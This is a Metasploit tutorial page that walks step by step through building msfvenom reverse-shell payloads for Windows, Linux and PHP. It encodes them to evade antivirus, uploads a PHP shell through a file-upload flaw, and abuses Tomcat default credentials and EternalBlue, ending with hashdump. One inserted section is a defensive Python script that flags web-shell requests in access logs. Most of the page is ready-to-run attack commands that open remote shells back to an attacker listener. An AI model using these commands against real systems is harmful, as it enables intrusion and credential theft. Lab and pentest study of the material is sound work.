07. Metasploit Custom Payload with msfvenom

1. Creating a Custom Payload with msfvenom

msfvenom is a powerful tool for creating payloads in various formats. Here's how to craft custom payloads.

Scenario: Windows Reverse Shell

  1. Generate Basic Reverse Shell Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o reverse_shell.exe
    
    • -p windows/meterpreter/reverse_tcp: Specifies the payload type.
    • LHOST/LPORT: IP address and port of the attacker's listener.
    • -f exe: Output format (exe for a Windows executable).
    • -o reverse_shell.exe: Save the output as reverse_shell.exe.

  2. Add Obfuscation: Encode the payload to bypass antivirus (the stock encoders are well known to antivirus engines, so encoding alone is not a reliable bypass; it rewrites the payload bytes, not its behaviour):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 -o encoded_reverse_shell.exe
    
    • -e x86/shikata_ga_nai: Encoder to use.
    • -i 5: Apply the encoder 5 times (iterations).

  3. Serve the Payload: Host the payload on an HTTP server, run from the directory that contains the file:

    python3 -m http.server 8080
    
  4. Set Up a Listener in Metasploit:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    exploit
    
  5. Execute the Payload: Once the target downloads and runs encoded_reverse_shell.exe, it connects back to the listener and you get a Meterpreter session.


2. Advanced Payload for Linux

Scenario: Linux Reverse Shell

  1. Generate Reverse Shell Payload:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell.elf
    
    • -f elf: Creates an ELF binary for 64-bit Linux systems.

  2. Set Up Listener:

    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    exploit
    
  3. Deploy Payload:

    • Transfer shell.elf to the Linux target.
    • Make it executable and run it:

      chmod +x shell.elf
      ./shell.elf
      

3. Exploiting a Web Server

Scenario: Custom PHP Reverse Shell

  1. Create a PHP Reverse Shell Payload:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell.php
    
  2. Customize Payload: Prepend the opening PHP tag so the web server executes the file as PHP:

    echo "<?php " | cat - shell.php > final_shell.php
    
  3. Upload the Payload: Use a file upload vulnerability in the web application to upload final_shell.php.

  4. Set Up Listener:

    use exploit/multi/handler
    set payload php/meterpreter_reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    exploit
    
  5. Trigger Payload: Visit the uploaded PHP file in the browser to execute it:

    http://192.168.1.200/uploads/final_shell.php
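
A defender-side counterpart to the upload-then-trigger chain in this section, added here as an example and not part of the original page: a Python check over constructed web server access log lines that flags any request for a PHP file under the upload directory, rating it higher when the same client POSTed an upload first. The /uploads/ path and the list of executable extensions are assumptions.

```python
import re

# Constructed sample lines in Apache/nginx combined log format (not taken from the page).
# Client .10 POSTs to the upload handler and then requests a PHP file from the upload
# directory; client .55 is benign; client .77 probes for a shell that is no longer there.
SAMPLE_LOG = """\
192.168.1.10 - - [01/Jan/2024:10:00:01 +0000] "POST /upload.php HTTP/1.1" 200 512 "-" "curl/8.0"
192.168.1.10 - - [01/Jan/2024:10:00:05 +0000] "GET /uploads/final_shell.php?v=2 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.55 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/cat.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.168.1.77 - - [01/Jan/2024:10:03:00 +0000] "GET /uploads/old.phtml HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
UPLOAD_DIR = "/uploads/"                         # assumed upload directory, as in the page's example URL
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed set of extensions the server executes as PHP

def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webshell_requests(log_text):
    """Flag GET requests for executable files under UPLOAD_DIR.
    Severity is 'high' when the same client POSTed earlier in the log (upload followed by
    execution from one address), otherwise 'medium'. Non-2xx responses are still reported:
    a 404 for a .php file in the upload directory is a probe worth seeing."""
    last_post = {}   # client ip -> path of its most recent POST
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST":
            last_post[ev["ip"]] = ev["path"]
            continue
        path = ev["path"].split("?", 1)[0]       # drop the query string before checking the extension
        if ev["method"] == "GET" and path.startswith(UPLOAD_DIR) and path.lower().endswith(EXEC_EXT):
            findings.append({
                "ip": ev["ip"],
                "shell": path,
                "status": int(ev["status"]),
                "prior_upload": last_post.get(ev["ip"]),
                "severity": "high" if ev["ip"] in last_post else "medium",
            })
    return findings
```

Calling find_webshell_requests(SAMPLE_LOG) returns two findings: a high-severity one for 192.168.1.10 (upload then execution) and a medium one for the 404 probe from 192.168.1.77.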
    

4. Using Specific Modules for Unique Scenarios

Example: Apache Tomcat Manager Upload

  1. Scenario: Exploiting default credentials on an Apache Tomcat Manager to deploy a malicious WAR file.

  2. Steps:

    1. Search for the exploit:

      search tomcat
      
    2. Select the module:

      use exploit/multi/http/tomcat_mgr_upload
      
    3. Set options (msfconsole's set command takes the rest of the line as the value, so keep comments off these lines):

      set RHOST 192.168.1.200
      set RPORT 8080
      set HTTPUSERNAME admin
      set HTTPPASSWORD password
      
      • RHOST: Target server.
      • RPORT 8080: Default Tomcat port.
      • HTTPUSERNAME/HTTPPASSWORD: Default Manager credentials (admin/password) being tested.

    4. Set payload:

      set payload java/meterpreter/reverse_tcp
      set LHOST 192.168.1.10
      set LPORT 4444
      
    5. Exploit:

      exploit
      

5. Exploiting SMB with EternalBlue

Scenario:

Targeting a Windows machine whose SMBv1 service is vulnerable to MS17-010 (CVE-2017-0143).

  1. Load the Exploit:

    use exploit/windows/smb/ms17_010_eternalblue
    
  2. Configure Options:

    set RHOST 192.168.1.100
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    
  3. Run the Exploit:

    exploit
    
  4. Post-Exploitation:

    • Display system information:

      sysinfo
      
    • Dump user hashes:

      hashdump